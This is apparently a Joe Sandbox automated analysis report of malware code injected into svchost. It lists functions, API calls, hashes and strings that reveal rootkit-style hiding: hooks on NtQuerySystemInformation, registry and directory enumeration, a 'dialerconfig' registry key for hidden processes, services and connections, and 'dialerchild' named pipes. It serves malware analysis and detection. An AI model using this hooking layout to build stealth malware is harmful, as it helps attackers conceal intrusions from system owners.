                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: dialer
                                                                                • API String ID: 0-3528709123
                                                                                • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                                • Instruction ID: 35bd7b7e84aeabd97046de9deeb150375f1cc12c8c169a2c29cf3a1cf66da4a6
                                                                                • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                                • Instruction Fuzzy Hash: 3ED05E71391A8786FB149FA688C46B06390AB047C4F8C90B4CE0403550DB38C98E9610
                                                                                Function 000001F28C1D273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3317699689.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction ID: f44ca3bbc8084d92389e86a6591f077caaf6d236089e246760dd531db40c924a
                                                                                • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction Fuzzy Hash: C761A172B41AA287DB988F1590807B97BD2F754BD4F588135DF6907788DB38ECA2C700
                                                                                Function 000001F28C93CA0C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: AllocHeap
                                                                                • String ID:
                                                                                • API String ID: 4292702814-0
                                                                                • Opcode ID: aac0828ce12dfb82e5a667a172eb8e62085a22ffbd2f9ceececb1565634b64c0
                                                                                • Instruction ID: 37f6b4a35d52c06492a2f816035ee87f2c0b4da3a164c87f2d500a2a78e06805
                                                                                • Opcode Fuzzy Hash: aac0828ce12dfb82e5a667a172eb8e62085a22ffbd2f9ceececb1565634b64c0
                                                                                • Instruction Fuzzy Hash: 9CF085703A1EC385FA64A7B258113F612C04B88BE0F0CA3F0ED2AC72C2DB3C84808620

                                                                                Non-executed Functions

                                                                                Function 000001F28C932B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 390 1f28c932b2c-1f28c932ba5 call 1f28c952ce0 393 1f28c932bab-1f28c932bb1 390->393 394 1f28c932ee0-1f28c932f03 390->394 393->394 395 1f28c932bb7-1f28c932bba 393->395 395->394 396 1f28c932bc0-1f28c932bc3 395->396 396->394 397 1f28c932bc9-1f28c932bd9 GetModuleHandleA 396->397 398 1f28c932bed 397->398 399 1f28c932bdb-1f28c932beb call 1f28c946090 397->399 401 1f28c932bf0-1f28c932c0e 398->401 399->401 401->394 404 1f28c932c14-1f28c932c33 StrCmpNIW 401->404 404->394 405 1f28c932c39-1f28c932c3d 404->405 405->394 406 1f28c932c43-1f28c932c4d 405->406 406->394 407 1f28c932c53-1f28c932c5a 406->407 407->394 408 1f28c932c60-1f28c932c73 407->408 409 1f28c932c75-1f28c932c81 408->409 410 1f28c932c83 408->410 411 1f28c932c86-1f28c932c8a 409->411 410->411 412 1f28c932c8c-1f28c932c98 411->412 413 1f28c932c9a 411->413 414 1f28c932c9d-1f28c932ca7 412->414 413->414 415 1f28c932d9d-1f28c932da1 414->415 416 1f28c932cad-1f28c932cb0 414->416 417 1f28c932ed2-1f28c932eda 415->417 418 1f28c932da7-1f28c932daa 415->418 419 1f28c932cc2-1f28c932ccc 416->419 420 1f28c932cb2-1f28c932cbf call 1f28c93199c 416->420 417->394 417->408 421 1f28c932dac-1f28c932db8 call 1f28c93199c 418->421 422 1f28c932dbb-1f28c932dc5 418->422 424 1f28c932d00-1f28c932d0a 419->424 425 1f28c932cce-1f28c932cdb 419->425 420->419 421->422 429 1f28c932df5-1f28c932df8 422->429 430 1f28c932dc7-1f28c932dd4 422->430 426 1f28c932d0c-1f28c932d19 424->426 427 1f28c932d3a-1f28c932d3d 424->427 425->424 432 1f28c932cdd-1f28c932cea 425->432 426->427 433 1f28c932d1b-1f28c932d28 426->433 434 1f28c932d4b-1f28c932d58 lstrlenW 427->434 435 1f28c932d3f-1f28c932d49 call 1f28c931bbc 427->435 438 1f28c932e05-1f28c932e12 lstrlenW 429->438 439 1f28c932dfa-1f28c932e03 call 1f28c931bbc 429->439 430->429 437 1f28c932dd6-1f28c932de3 430->437 440 1f28c932ced-1f28c932cf3 432->440 443 1f28c932d2b-1f28c932d31 433->443 445 1f28c932d7b-1f28c932d8d call 1f28c933844 434->445 446 1f28c932d5a-1f28c932d64 434->446 435->434 449 1f28c932d93-1f28c932d98 435->449 447 1f28c932de6-1f28c932dec 437->447 441 1f28c932e35-1f28c932e3f call 1f28c933844 438->441 442 1f28c932e14-1f28c932e1e 438->442 439->438 457 1f28c932e4a-1f28c932e55 439->457 440->449 450 1f28c932cf9-1f28c932cfe 440->450 452 1f28c932e42-1f28c932e44 441->452 442->441 451 1f28c932e20-1f28c932e33 call 1f28c93152c 442->451 443->449 453 1f28c932d33-1f28c932d38 443->453 445->449 445->452 446->445 456 1f28c932d66-1f28c932d79 call 1f28c93152c 446->456 447->457 458 1f28c932dee-1f28c932df3 447->458 449->452 450->424 450->440 451->441 451->457 452->417 452->457 453->427 453->443 456->445 456->449 464 1f28c932e57-1f28c932e5b 457->464 465 1f28c932ecc-1f28c932ed0 457->465 458->429 458->447 468 1f28c932e63-1f28c932e7d call 1f28c9385c0 464->468 469 1f28c932e5d-1f28c932e61 464->469 465->417 471 1f28c932e80-1f28c932e83 468->471 469->468 469->471 473 1f28c932e85-1f28c932ea3 call 1f28c9385c0 471->473 474 1f28c932ea6-1f28c932ea9 471->474 473->474 474->465 477 1f28c932eab-1f28c932ec9 call 1f28c9385c0 474->477 477->465
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                • API String ID: 2119608203-3850299575
                                                                                • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                • Instruction ID: 5ddfa2ae8d86f9d74b9217bdca104cd19bacd61b75c306f4a54b144b8a2605f5
                                                                                • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                • Instruction Fuzzy Hash: A3B16776250ED286EB698F35D4417F963E5FB44BC4F4860B6EE0997BA6EB35C880C340
                                                                                Function 000001F28C937D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 3140674995-0
                                                                                • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction ID: 315950f2970cd4e23eb0bb7edb8b7cf3ceedc3dc3316b9e43c8c6da18fa3bab3
                                                                                • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction Fuzzy Hash: C2313B72245FC19AEB609F60E8807FD73A5F784788F48446ADA4E57B98EF38C648C710
                                                                                Function 000001F28C93D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 1239891234-0
                                                                                • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction ID: de600b675c99b63b07bfc61b3ea15e563d1fd6e5409b2fafadfe2c025ff4e9af
                                                                                • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction Fuzzy Hash: B7316672254FC196EB608B25E8803FE73A4F789798F540166EA9D43BA8EF38C545CB00
                                                                                Function 000001F28C931628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                • API String ID: 106492572-2879589442
                                                                                • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction ID: c2eb12f427962f4a473e0d6cdd6568ad5d847194dadf60defaa1d10753933b52
                                                                                • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction Fuzzy Hash: A871D676250E92C6EB209F76E8906F923E4FB84BCDF046161DE4E57A69EF38C444C744
                                                                                Function 000001F28C9312BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                • String ID: d
                                                                                • API String ID: 2005889112-2564639436
                                                                                • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction ID: 18f95a425c74309a6456fd4bbe7ec78cd519c13267e7c4c7f8ddd63764443e45
                                                                                • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction Fuzzy Hash: 8E512676244F85C6EB54CF62E5483BAB7E1F789BD9F048134DA4A07B68EF38C1498B00
                                                                                Function 000001F28C931D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                • API String ID: 4175298099-1975688563
                                                                                • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction ID: 9487c6cd3bd73dd193c882a9535ab93ec09423b9485fe8c9d985bb2c2d5cc9fb
                                                                                • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction Fuzzy Hash: A3318F79280ECBA1EA05EBB5EC616F463A4F7043C4F88A0F3E85953576AF388259C350
                                                                                Function 000001F28C1D6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 232 1f28c1d6910-1f28c1d6916 233 1f28c1d6951-1f28c1d695b 232->233 234 1f28c1d6918-1f28c1d691b 232->234 235 1f28c1d6a78-1f28c1d6a8d 233->235 236 1f28c1d691d-1f28c1d6920 234->236 237 1f28c1d6945-1f28c1d6984 call 1f28c1d6fc0 234->237 241 1f28c1d6a8f 235->241 242 1f28c1d6a9c-1f28c1d6ab6 call 1f28c1d6e54 235->242 239 1f28c1d6938 __scrt_dllmain_crt_thread_attach 236->239 240 1f28c1d6922-1f28c1d6925 236->240 255 1f28c1d698a-1f28c1d699f call 1f28c1d6e54 237->255 256 1f28c1d6a52 237->256 244 1f28c1d693d-1f28c1d6944 239->244 246 1f28c1d6931-1f28c1d6936 call 1f28c1d6f04 240->246 247 1f28c1d6927-1f28c1d6930 240->247 248 1f28c1d6a91-1f28c1d6a9b 241->248 253 1f28c1d6aef-1f28c1d6b20 call 1f28c1d7190 242->253 254 1f28c1d6ab8-1f28c1d6aed call 1f28c1d6f7c call 1f28c1d6e1c call 1f28c1d7318 call 1f28c1d7130 call 1f28c1d7154 call 1f28c1d6fac 242->254 246->244 264 1f28c1d6b31-1f28c1d6b37 253->264 265 1f28c1d6b22-1f28c1d6b28 253->265 254->248 267 1f28c1d6a6a-1f28c1d6a77 call 1f28c1d7190 255->267 268 1f28c1d69a5-1f28c1d69b6 call 1f28c1d6ec4 255->268 259 1f28c1d6a54-1f28c1d6a69 256->259 270 1f28c1d6b7e-1f28c1d6b94 call 1f28c1d268c 264->270 271 1f28c1d6b39-1f28c1d6b43 264->271 265->264 269 1f28c1d6b2a-1f28c1d6b2c 265->269 267->235 285 1f28c1d6a07-1f28c1d6a11 call 1f28c1d7130 268->285 286 1f28c1d69b8-1f28c1d69dc call 1f28c1d72dc call 1f28c1d6e0c call 1f28c1d6e38 call 1f28c1dac0c 268->286 275 1f28c1d6c1f-1f28c1d6c2c 269->275 288 1f28c1d6bcc-1f28c1d6bce 270->288 289 1f28c1d6b96-1f28c1d6b98 270->289 276 1f28c1d6b4f-1f28c1d6b5d call 1f28c1e5780 271->276 277 1f28c1d6b45-1f28c1d6b4d 271->277 282 1f28c1d6b63-1f28c1d6b78 call 1f28c1d6910 276->282 299 1f28c1d6c15-1f28c1d6c1d 276->299 277->282 282->270 282->299 285->256 308 1f28c1d6a13-1f28c1d6a1f call 1f28c1d7180 285->308 286->285 335 1f28c1d69de-1f28c1d69e5 __scrt_dllmain_after_initialize_c 286->335 297 1f28c1d6bd0-1f28c1d6bd3 288->297 298 1f28c1d6bd5-1f28c1d6bea call 1f28c1d6910 288->298 289->288 296 1f28c1d6b9a-1f28c1d6bbc call 1f28c1d268c call 1f28c1d6a78 289->296 296->288 329 1f28c1d6bbe-1f28c1d6bc6 call 1f28c1e5780 296->329 297->298 297->299 298->299 317 1f28c1d6bec-1f28c1d6bf6 298->317 299->275 319 1f28c1d6a21-1f28c1d6a2b call 1f28c1d7098 308->319 320 1f28c1d6a45-1f28c1d6a50 308->320 323 1f28c1d6c01-1f28c1d6c11 call 1f28c1e5780 317->323 324 1f28c1d6bf8-1f28c1d6bff 317->324 319->320 334 1f28c1d6a2d-1f28c1d6a3b 319->334 320->259 323->299 324->299 329->288 334->320 335->285 336 1f28c1d69e7-1f28c1d6a04 call 1f28c1dabc8 335->336 336->285
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3317699689.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                • API String ID: 190073905-1786718095
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: 3ae14674ec2a8346f3f84ed9e0c01df585913646f7da2965e941060b61735599
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: F581F0717C0E038AFA54DB66A4C03F96ED0AB85BC0F448935FB498379ADB38E8458700
                                                                                Function 000001F28C93CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetLastError.KERNEL32 ref: 000001F28C93CE37
                                                                                • FlsGetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CE4C
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CE6D
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CE9A
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CEAB
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CEBC
                                                                                • SetLastError.KERNEL32 ref: 000001F28C93CED7
                                                                                • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CF0D
                                                                                • FlsSetValue.KERNEL32(?,?,00000001,000001F28C93ECCC,?,?,?,?,000001F28C93BF9F,?,?,?,?,?,000001F28C937AB0), ref: 000001F28C93CF2C
                                                                                  • Part of subcall function 000001F28C93D6CC: HeapAlloc.KERNEL32 ref: 000001F28C93D721
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CF54
                                                                                  • Part of subcall function 000001F28C93D744: HeapFree.KERNEL32 ref: 000001F28C93D75A
                                                                                  • Part of subcall function 000001F28C93D744: GetLastError.KERNEL32 ref: 000001F28C93D764
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CF65
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CF76
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 570795689-0
                                                                                • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction ID: c1dccc9a58c3acbe364e99b3de5aaac7dedc88dfaa24f6078136831367b18d4b
                                                                                • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction Fuzzy Hash: 274149713C1EC782FA68A73159553FA22C25B84BF4F2C27B4E836076E6EF3998018200
                                                                                Function 000001F28C932244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2171963597-1373409510
                                                                                • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction ID: 57cb264d3990d0bdc8e496bdce57bc45f54469c11ba177c15f029bb998e39be8
                                                                                • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction Fuzzy Hash: BE213876658E82C2EB209B25F4443BA67E0F789BE5F544265EA5907AA8DF3CC149CB00
                                                                                Function 000001F28C1D9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 490 1f28c1d9944-1f28c1d99ac call 1f28c1da814 493 1f28c1d9e13-1f28c1d9e1b call 1f28c1dbb48 490->493 494 1f28c1d99b2-1f28c1d99b5 490->494 494->493 495 1f28c1d99bb-1f28c1d99c1 494->495 497 1f28c1d9a90-1f28c1d9aa2 495->497 498 1f28c1d99c7-1f28c1d99cb 495->498 500 1f28c1d9aa8-1f28c1d9aac 497->500 501 1f28c1d9d63-1f28c1d9d67 497->501 498->497 502 1f28c1d99d1-1f28c1d99dc 498->502 500->501 505 1f28c1d9ab2-1f28c1d9abd 500->505 503 1f28c1d9da0-1f28c1d9daa call 1f28c1d8a34 501->503 504 1f28c1d9d69-1f28c1d9d70 501->504 502->497 506 1f28c1d99e2-1f28c1d99e7 502->506 503->493 516 1f28c1d9dac-1f28c1d9dcb call 1f28c1d6d40 503->516 504->493 507 1f28c1d9d76-1f28c1d9d9b call 1f28c1d9e1c 504->507 505->501 509 1f28c1d9ac3-1f28c1d9aca 505->509 506->497 510 1f28c1d99ed-1f28c1d99f7 call 1f28c1d8a34 506->510 507->503 513 1f28c1d9ad0-1f28c1d9b07 call 1f28c1d8e10 509->513 514 1f28c1d9c94-1f28c1d9ca0 509->514 510->516 524 1f28c1d99fd-1f28c1d9a28 call 1f28c1d8a34 * 2 call 1f28c1d9124 510->524 513->514 529 1f28c1d9b0d-1f28c1d9b15 513->529 514->503 517 1f28c1d9ca6-1f28c1d9caa 514->517 521 1f28c1d9cba-1f28c1d9cc2 517->521 522 1f28c1d9cac-1f28c1d9cb8 call 1f28c1d90e4 517->522 521->503 528 1f28c1d9cc8-1f28c1d9cd5 call 1f28c1d8cb4 521->528 522->521 538 1f28c1d9cdb-1f28c1d9ce3 522->538 558 1f28c1d9a2a-1f28c1d9a2e 524->558 559 1f28c1d9a48-1f28c1d9a52 call 1f28c1d8a34 524->559 528->503 528->538 530 1f28c1d9b19-1f28c1d9b4b 529->530 535 1f28c1d9b51-1f28c1d9b5c 530->535 536 1f28c1d9c87-1f28c1d9c8e 530->536 535->536 539 1f28c1d9b62-1f28c1d9b7b 535->539 536->514 536->530 540 1f28c1d9df6-1f28c1d9e12 call 1f28c1d8a34 * 2 call 1f28c1dbaa8 538->540 541 1f28c1d9ce9-1f28c1d9ced 538->541 543 1f28c1d9b81-1f28c1d9bc6 call 1f28c1d90f8 * 2 539->543 544 1f28c1d9c74-1f28c1d9c79 539->544 540->493 545 1f28c1d9cef-1f28c1d9cfe call 1f28c1d90e4 541->545 546 1f28c1d9d00 541->546 571 1f28c1d9bc8-1f28c1d9bee call 1f28c1d90f8 call 1f28c1da038 543->571 572 1f28c1d9c04-1f28c1d9c0a 543->572 550 1f28c1d9c84 544->550 554 1f28c1d9d03-1f28c1d9d0d call 1f28c1da8ac 545->554 546->554 550->536 554->503 569 1f28c1d9d13-1f28c1d9d61 call 1f28c1d8d44 call 1f28c1d8f50 554->569 558->559 563 1f28c1d9a30-1f28c1d9a3b 558->563 559->497 575 1f28c1d9a54-1f28c1d9a74 call 1f28c1d8a34 * 2 call 1f28c1da8ac 559->575 563->559 568 1f28c1d9a3d-1f28c1d9a42 563->568 568->493 568->559 569->503 591 1f28c1d9bf0-1f28c1d9c02 571->591 592 1f28c1d9c15-1f28c1d9c72 call 1f28c1d9870 571->592 579 1f28c1d9c7b 572->579 580 1f28c1d9c0c-1f28c1d9c10 572->580 596 1f28c1d9a8b 575->596 597 1f28c1d9a76-1f28c1d9a80 call 1f28c1da99c 575->597 581 1f28c1d9c80 579->581 580->543 581->550 591->571 591->572 592->581 596->497 600 1f28c1d9df0-1f28c1d9df5 call 1f28c1dbaa8 597->600 601 1f28c1d9a86-1f28c1d9def call 1f28c1d86ac call 1f28c1da3f4 call 1f28c1d88a0 597->601 600->540 601->600
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3317699689.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction ID: a9609446f00a766f3d3b655ef47b5d2ff7605ba4997714f758606ca2dc9d6f4c
                                                                                • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction Fuzzy Hash: 38E15672644F828AEB609F65E4803ED7BE0F755BD8F104125EB8957B9ACF38E491C740
                                                                                Function 000001F28C93A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
